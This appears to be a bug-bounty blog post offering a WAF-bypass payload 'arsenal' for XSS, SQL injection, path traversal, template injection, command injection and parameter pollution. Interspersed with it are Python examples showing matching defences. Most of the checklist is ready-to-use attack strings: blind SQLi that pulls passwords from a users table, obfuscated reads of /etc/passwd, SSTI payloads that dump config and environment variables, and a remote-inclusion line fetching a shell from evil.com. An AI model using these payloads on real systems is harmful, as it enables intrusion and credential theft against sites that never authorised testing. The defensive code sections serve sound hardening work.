A practical, hands-on checklist of advanced XSS, SQLi, Path Traversal, and Code Injection payloads designed to bypass WAFs and find critical vulnerabilities

Let me tell you about the night I found three critical vulnerabilities in under two hours on a program that others had declared 'hardened.' The secret wasn't magic—it was this payload checklist.

After getting consistently blocked by CloudFlare and custom WAF rules on program after program, I built this arsenal through pure necessity. I documented what actually worked when standard payloads failed. The null byte variations, the case-obfuscation tricks, the timing-based SQLi that slips right through.

This collection isn't just academic—it's been my secret weapon across 100+ real-world bug bounty engagements. From bypassing Akamai on a tech giant's asset to exploiting parameter pollution in a fintech application, these payloads have consistently proven their value where it matters most: the bank.

Introduction: The Mindset


This is not a list to spray and pray. The key to advanced bug hunting is:

1. Context: Understand where you are injecting (inside an HTML tag? in a JavaScript string? in a SQL query?).
2. Observe: See how the application encodes, filters, or blocks your input.
3. Adapt: Use the appropriate payload from this list to bypass the specific filter.

Tool Recommendation: Use Burp Suite's Logger++ or a similar extension to track all your requests and responses. Use Turbo Intruder or Burp Intruder for heavy payload testing.

1. Advanced XSS Payloads (WAF & Filter Bypass)

A. For Injecting into HTML Context (e.g., <div>INJECTION_HERE</div>)

· Basic WAF Bypass Vectors:

<img src=x onerror="prompt(1)">
<img src=x onerror=prompt`1`> // Backticks instead of parentheses
<svg onload=alert`1`>
<script>prompt(1)</script> // If `script` is allowed but `onerror` is blocked

· Case Manipulation & Obfuscation:

<ScRiPt>alert(1)</ScRiPt>
<img src=x oNeRrOr=alert(1)>

· HTML Entity & Encoding Bypass:

<!-- If the app encodes only the first occurrence of a tag -->
<<script>alert(1)</script>
<!-- Using HTML entities inside the tag -->
<img src=x onerror="alert(1)">
<!-- JavaScript URL in a tag that doesn't require user interaction -->
<body onload=alert(1)>
<iframe src="javascript:alert(1)">

B. For Injecting into Attribute Context (e.g., <input type="text" value="INJECTION_HERE">)

· Breaking out of the Attribute:

"><script>alert(1)</script>
" autofocus onfocus=alert(1) x="
' onmouseover='alert(1)

· Without Closing the Tag (if filters block >):

" autofocus onfocus=alert(1) //

C. For Injecting into JavaScript Context (e.g., <script>var name = 'INJECTION_HERE'</script>)

· Breaking out of the String:

';alert(1);//
';prompt(1);'
</script><script>alert(1)</script>
\'; alert(1);//

· Advanced JS Context Escalation:

// If you're inside a function or event
-alert(1)-
;[1].find(alert)
eval('al'+'ert(1)')
top['al'+'ert'](1)
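The defender's side of the "Context" rule from the introduction, as an added Python example (not part of the original checklist): the payload shapes from sections A, B and C rendered through an encoder that matches each context, next to the mistake that section C relies on (HTML-escaping a value that lands inside a JavaScript string, which leaves the quote intact). The payload strings and the `render_*` function names are constructed for this example.

```python
import html
import json

# Constructed inputs that follow the payload shapes in section 1 (A, B and C).
HTML_PAYLOAD = '<img src=x onerror="prompt(1)">'
ATTR_PAYLOAD = '" autofocus onfocus=alert(1) x="'
JS_PAYLOAD = "';alert(1);//"
JS_CLOSE_TAG_PAYLOAD = "</script><script>alert(1)</script>"


def render_html_body(value: str) -> str:
    """Context A: the value lands between tags, so '<', '>', '&' and both quote
    characters become entities and no new tag can start."""
    return f"<div>{html.escape(value, quote=True)}</div>"


def render_attribute(value: str) -> str:
    """Context B: the value lands inside a quoted attribute. Quoting the attribute
    AND escaping quotes inside it keeps ' autofocus onfocus=' as plain data."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


def render_js_string(value: str) -> str:
    """Context C: the value lands inside a JavaScript string literal. JSON encoding
    escapes quotes and backslashes; '<', '>' and '/' are additionally written as
    JS escapes so a literal '</script>' in the data cannot end the script block."""
    encoded = json.dumps(value)
    encoded = encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("/", "\\/")
    return f"<script>var name = {encoded};</script>"


def render_js_string_wrong(value: str) -> str:
    """The mistake section C exploits: only HTML-escaping '<', '>' and '&' before
    dropping the value into a JS string. The quote survives and ends the literal."""
    return f"<script>var name = '{html.escape(value, quote=False)}';</script>"


def demo() -> dict:
    """Render each constructed payload in its matching context."""
    return {
        "body": render_html_body(HTML_PAYLOAD),
        "attribute": render_attribute(ATTR_PAYLOAD),
        "js": render_js_string(JS_PAYLOAD),
        "js_close_tag": render_js_string(JS_CLOSE_TAG_PAYLOAD),
        "js_wrong": render_js_string_wrong(JS_PAYLOAD),
    }


if __name__ == "__main__":
    for context, rendered in demo().items():
        print(f"{context:>12}: {rendered}")
```

Note that `render_js_string_wrong` is exactly the pattern behind section C: an HTML encoder applied in a JavaScript context neutralises `</script>` but not the quote, so `';alert(1);//` still terminates the string. A reviewer checking a template should ask, for every interpolation, which of the three encoders applies.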

2. Advanced SQLi Payloads (All DBs, WAF Bypass)

A. Union-Based SQLi (Identify column count first)

· Basic Union:

' ORDER BY 10-- - // Find column count
' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -

· WAF Bypass for UNION/SELECT:

' UniOn SelEcT 1,2,3-- -
' UNI/**/ON SEL/**/ECT 1,2,3-- - // Using comments to break up keywords
' UNION (SELECT 1,2,3)-- - // Using parentheses

B. Boolean-Based Blind SQLi

· MySQL:

' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- -
' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'-- -

· MSSQL:

' AND SUBSTRING((SELECT TOP 1 password FROM users),1,1)='a'-- -

· Oracle:

' AND (SELECT SUBSTR((SELECT password FROM users WHERE rownum=1),1,1) FROM DUAL)='a'-- -

C. Time-Based Blind SQLi (When no output is shown)

· MySQL:

' AND SLEEP(5)-- -
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -

· PostgreSQL:

' AND PG_SLEEP(5)-- -

· MSSQL:

'; WAITFOR DELAY '0:0:5'-- -

· Oracle:

' AND (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3) > 0-- - // Heavy query to cause delay

D. WAF Bypass Tricks for SQLi

· Null Bytes (PHP apps):

%00' UNION SELECT 1,2,3-- -

· URL Encoding:

%55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3-- - // URL-encoded "UNION SELECT"

· Double URL Encoding:

%2555%256e%2569%256f%256e ... // Double-encoded "UNION": each byte is encoded twice (%55 -> %2555)

· Using Comments:

/*!50000UNION*/ /*!50000SELECT*/ 1,2,3-- - // MySQL version-specific execution
UN/**/ION SEL/**/ECT 1,2,3-- -
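Why the column-count probe and the UNION payloads in section 2.A work at all, and what stops them, as an added Python example (not part of the original checklist): the same three-column lookup written once with string concatenation and once with a bound parameter, run against a constructed in-memory SQLite table. The table, the `lookup_*` names and the `compare` helper are constructed for this example; the two payload strings are the ones from section 2.A.

```python
import sqlite3

# Payloads copied from section 2.A. The query below returns three columns, so
# the UNION probe lines up with it (the page's point: find the column count first).
ORDER_BY_PROBE = "' ORDER BY 10-- -"
UNION_PAYLOAD = "' UNION SELECT 1,2,3-- -"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample database for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "widget", 9.99), (2, "gadget", 19.99)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """String concatenation: the user's quote closes the literal and everything
    after it is parsed as SQL. '-- -' then comments out the trailing quote."""
    sql = f"SELECT id, name, price FROM products WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Bound parameter: the driver ships the value separately from the statement,
    so quotes, comment markers and keywords are just characters being compared."""
    sql = "SELECT id, name, price FROM products WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def compare(payload: str) -> dict:
    """Run one input through both code paths and report what each produced.
    A database error reaching the caller is what makes ORDER BY probing useful
    to an attacker, so the vulnerable path reports it as text."""
    conn = make_db()
    try:
        vulnerable = lookup_vulnerable(conn, payload)
    except sqlite3.Error as exc:
        vulnerable = f"ERROR: {exc}"
    return {"vulnerable": vulnerable, "safe": lookup_safe(conn, payload)}


if __name__ == "__main__":
    for label, payload in [("order by", ORDER_BY_PROBE), ("union", UNION_PAYLOAD), ("plain", "widget")]:
        print(f"{label:>9}: {compare(payload)}")
```

The parameterised path returns no rows for both payloads: there is simply no product whose name is the literal string `' UNION SELECT 1,2,3-- -`. The concatenated path raises an ORDER BY range error for the probe (the signal the checklist says to look for) and returns the injected `(1, 2, 3)` row for the UNION payload. None of the case, comment or encoding tricks in section 2.D change this, because they only matter once the input is being parsed as SQL.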

3. Advanced Path Traversal (LFI) & WAF Bypass

· Basic Traversal:

../../../../etc/passwd

· URL Encoding:

..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

· Double URL Encoding:

..%252f..%252f..%252f..%252fetc%252fpasswd

· Unicode/UTF-8 Smuggling:

..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd // Sometimes bypasses filters that decode after WAF

· Null Byte Injection (PHP < 5.3.4):

../../../../etc/passwd%00
....//....//....//....//etc/passwd // Defeats filters that strip "../" only once (non-recursively)

· Path Truncation (PHP):

../../../../etc/passwd.\.\.\.\.\.\.\[ADD MANY]\.\.\.\
/etc/passwd/././././././.[ADD MANY]/./././.

· Using php://filter for Code Execution (PHP LFI):

php://filter/convert.base64-encode/resource=../../../../etc/passwd
php://filter/read=string.rot13/resource=index.php

· Direct File Inclusion for RCE:

http://evil.com/shell.txt
\\evil.com\share\shell.txt (Windows SMB)
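Every encoding trick in section 3 (and the URL-encoding and comment tricks in section 2.D) depends on a filter that inspects the input before the last decoding step. The following added Python example, which is not part of the original checklist, shows the defensive counterpart: decode until the value stops changing, reject what strict decoding refuses (overlong UTF-8, NUL bytes), then decide on the resolved path rather than on `../` patterns. The `..//` line from section 3 is included because it illustrates the opposite approach failing: a one-shot `../` strip turns it into a traversal, while the resolve-and-contain check never needed to recognise it. The payload list is copied from the page; the base directory, function names and `normalize_sql_fragment` are constructed for this example.

```python
import os
import re
import urllib.parse

# Constructed inputs copied from section 3 (path forms) of the checklist.
TRAVERSAL_PAYLOADS = [
    "../../../../etc/passwd",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "..%252f..%252f..%252f..%252fetc%252fpasswd",
    "..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
    "../../../../etc/passwd%00",
]
STRIP_BYPASS = "....//....//....//....//etc/passwd"


def percent_decode_fully(raw: str, max_rounds: int = 5) -> bytes:
    """Percent-decode until the value stops changing, so %252f and %2f both end
    up as '/'. Bounded so a hostile input cannot keep the loop going."""
    current = raw.encode("utf-8")
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_to_bytes(current)
        if decoded == current:
            break
        current = decoded
    return current


def canonicalize_path(raw: str) -> str:
    """Strict decode: overlong UTF-8 (%c0%af) and NUL bytes are rejected rather
    than mapped, because some layer downstream would read them as '/' or end-of-string."""
    data = percent_decode_fully(raw)
    try:
        text = data.decode("utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError("invalid UTF-8 in path") from exc
    if "\x00" in text:
        raise ValueError("NUL byte in path")
    return text


def safe_join(base_dir: str, user_path: str):
    """Resolve the request under base_dir and keep it only if the resolved path is
    still inside base_dir. Returns the resolved absolute path, or None to refuse."""
    base = os.path.realpath(base_dir)
    try:
        candidate = canonicalize_path(user_path)
    except ValueError:
        return None
    resolved = os.path.realpath(os.path.join(base, candidate))
    if resolved == base or resolved.startswith(base + os.sep):
        return resolved
    return None


def naive_strip(user_path: str) -> str:
    """The filter that '....//' is built to defeat: a single, non-recursive removal."""
    return user_path.replace("../", "")


def normalize_sql_fragment(raw: str) -> str:
    """The same decode-until-stable idea applied to a query parameter before any
    keyword matching: MySQL /*!NNNNN ... */ comments keep their contents, other inline
    comments are dropped, and case is folded so the section 2.D variants look alike."""
    text = percent_decode_fully(raw).decode("utf-8", errors="replace")
    text = re.sub(r"/\*!\d*(.*?)\*/", r"\1", text)
    text = re.sub(r"/\*.*?\*/", "", text)
    return text.upper()


if __name__ == "__main__":
    for payload in TRAVERSAL_PAYLOADS + [STRIP_BYPASS]:
        print(f"{payload!r:55} -> {safe_join('/srv/files', payload)}")
    print("naive strip:", naive_strip(STRIP_BYPASS))
```

`safe_join` accepts the `....//` input because, without a stripping filter, it only names a directory literally called `....` inside the base; `naive_strip` of the same input yields `../../../../etc/passwd`, which `safe_join` then refuses. The lesson for a code reviewer is that a containment check on the resolved path is robust where any blocklist of `../` spellings is not.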

4. Advanced Code Injection (SSTI, Command Injection)

A. Server-Side Template Injection (SSTI)

· Probe for Template Engine:

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#[7*7]

· Once Engine Identified (e.g., Jinja2, Twig - Python/PHP):

{{ ''.__class__.__mro__[1].__subclasses__() }} // Find useful classes
{{ config.items() }} // Flask config dump
{{ cycler.__init__.__globals__.os.environ }} // Access OS environment

B. OS Command Injection

· Classic Operators:

; whoami
& whoami
| whoami
` whoami `
$(whoami)

· WAF Bypass with Encoding:

%0a whoami %0a // Newline
%26%20whoami // URL-encoded "& whoami"

· Command Obfuscation:

w'h'o'a'm'i
w$@hoami
who"a"mi
/???/??t /???/??ss?? // /bin/cat /etc/passwd (Wildcards)
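All of section 4.B, operators, encodings and the quote-splitting obfuscations alike, only works when user input is handed to a shell as part of a command string. The added Python example below, which is not part of the original checklist, shows the two controls that remove that precondition: an allowlist on the value and an argument vector that never involves a shell, with `shlex.quote` as the fallback when a shell string is unavoidable. The sample inputs are constructed from the operator shapes on the page; `wc -l` as the wrapped command and the function names are assumptions of this example.

```python
import re
import shlex
import subprocess
import sys

# Constructed inputs built from the operator shapes in section 4.B.
INJECTION_ATTEMPTS = [
    "report.txt; whoami",
    "report.txt | whoami",
    "$(whoami)",
    "`whoami`",
    "report.txt%0awhoami",
]

# Conservative allowlist for a file name parameter: letters, digits, '_', '.', '-'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def validate_filename(name: str) -> bool:
    """Allowlist check. A leading dot is refused as well so '..' and dotfiles
    never reach the command, whatever the rest of the name looks like."""
    return bool(SAFE_NAME.match(name)) and not name.startswith(".")


def shell_command_vulnerable(filename: str) -> str:
    """The dangerous shape: a string destined for /bin/sh. Returned, never run here.
    Every operator in section 4.B is meaningful to the shell in this position."""
    return f"wc -l {filename}"


def shell_command_quoted(filename: str) -> str:
    """If a shell string is unavoidable, shlex.quote turns the value into a single
    word; '--' stops a value beginning with '-' from being read as an option."""
    return f"wc -l -- {shlex.quote(filename)}"


def build_argv(filename: str) -> list:
    """Preferred shape: an argument vector. With no shell in the picture, ';',
    '|', backticks and '$(...)' are ordinary bytes in one argument."""
    return ["wc", "-l", "--", filename]


def run_without_shell(filename: str) -> str:
    """Execute a child with an argv list and return what it saw as argv[1].
    The child is the Python interpreter itself so this runs on any host."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", filename],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    for attempt in INJECTION_ATTEMPTS:
        print(f"{attempt!r:24} allowlist={validate_filename(attempt)!s:5} "
              f"argv={build_argv(attempt)} quoted={shell_command_quoted(attempt)!r}")
```

`run_without_shell("report.txt; whoami")` returns the string `report.txt; whoami` unchanged, which is the whole point: the child received one argument and no shell ever parsed it. The allowlist is the stronger of the two controls because it also catches inputs that are harmless to the shell but wrong for the application, and it is the one a WAF cannot be talked around with the encodings in this section.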

5. HTTP Parameter Pollution (HPP) & Response Manipulation

· Pollution for Logic Flaws:
  · Scenario: POST /buy?price=10
  · Payload: POST /buy?price=10&price=0
  · The backend might use the first or last parameter, potentially setting the price to 0.
· Pollution for XSS/SQLi Bypass:
  · Scenario: Input is filtered in the POST body but not in GET parameters.
  · Payload: Inject the payload in a GET parameter and pollute it into the POST body, or vice-versa.
· Parameter Fragmentation / WAF Bypass:
  · ?user[name]=admin&user[password]=pass (Array-based)
  · ?param=1&param=2 (See which one the app uses)
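The "first or last parameter" ambiguity above is the whole mechanism of HPP, so here is an added Python example (not part of the original checklist) that makes it concrete with the standard library's query-string parser: two resolvers that model a first-wins and a last-wins backend, a detection helper that lists duplicated keys for edge logging, and a strict parser that refuses the request instead of guessing. The query strings are constructed from the section 5 scenario; the function names are assumptions of this example.

```python
from urllib.parse import parse_qs, parse_qsl

# Constructed query strings modelled on the section 5 scenario.
POLLUTED = "price=10&price=0"
CLEAN = "price=10&qty=2"


def first_wins(query: str) -> dict:
    """Model of a backend that keeps the first occurrence of each key."""
    return {key: values[0] for key, values in parse_qs(query, keep_blank_values=True).items()}


def last_wins(query: str) -> dict:
    """Model of a backend that keeps the last occurrence of each key."""
    return {key: values[-1] for key, values in parse_qs(query, keep_blank_values=True).items()}


def duplicate_keys(query: str) -> list:
    """Detection view: keys that appear more than once. Worth logging at the edge,
    because a WAF and the application may not pick the same occurrence."""
    return sorted(
        key for key, values in parse_qs(query, keep_blank_values=True).items()
        if len(values) > 1
    )


def parse_strict(query: str) -> dict:
    """Hardened parser: a repeated key is a malformed request, not a choice to make."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in params:
            raise ValueError(f"duplicate parameter: {key}")
        params[key] = value
    return params


def is_polluted(query: str) -> bool:
    """True when the strict parser would refuse the query."""
    try:
        parse_strict(query)
    except ValueError:
        return False or True
    return False


if __name__ == "__main__":
    print("first wins :", first_wins(POLLUTED))
    print("last wins  :", last_wins(POLLUTED))
    print("duplicates :", duplicate_keys(POLLUTED))
    print("polluted?  :", is_polluted(POLLUTED), is_polluted(CLEAN))
```

The first two functions disagree about `price` on the same request, which is exactly the gap a filter in front of the application cannot close by inspection alone. Beyond rejecting duplicates, the design fix for the page's scenario is to not take a price from the client at all and to look it up server-side from the product identifier.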

Final Checklist & Workflow

1. Recon & Parameter Discovery: Use tools to find every possible input (URL params, POST data, Headers, Cookies).
2. Fuzz with Basics: Send a simple payload for each vulnerability type to see initial behavior.
3. Analyze Defenses: Did you get blocked? Was your input altered? Encoded? Filtered?
4. Deploy Advanced Payloads: Based on your analysis, use the relevant WAF-bypass payloads from this list.
5. Automate Intelligently: Use Burp Intruder with a custom payload list derived from this checklist for the specific vulnerability you're hunting.

This list is a living arsenal. Keep it updated with new bypass techniques you discover. Happy hunting.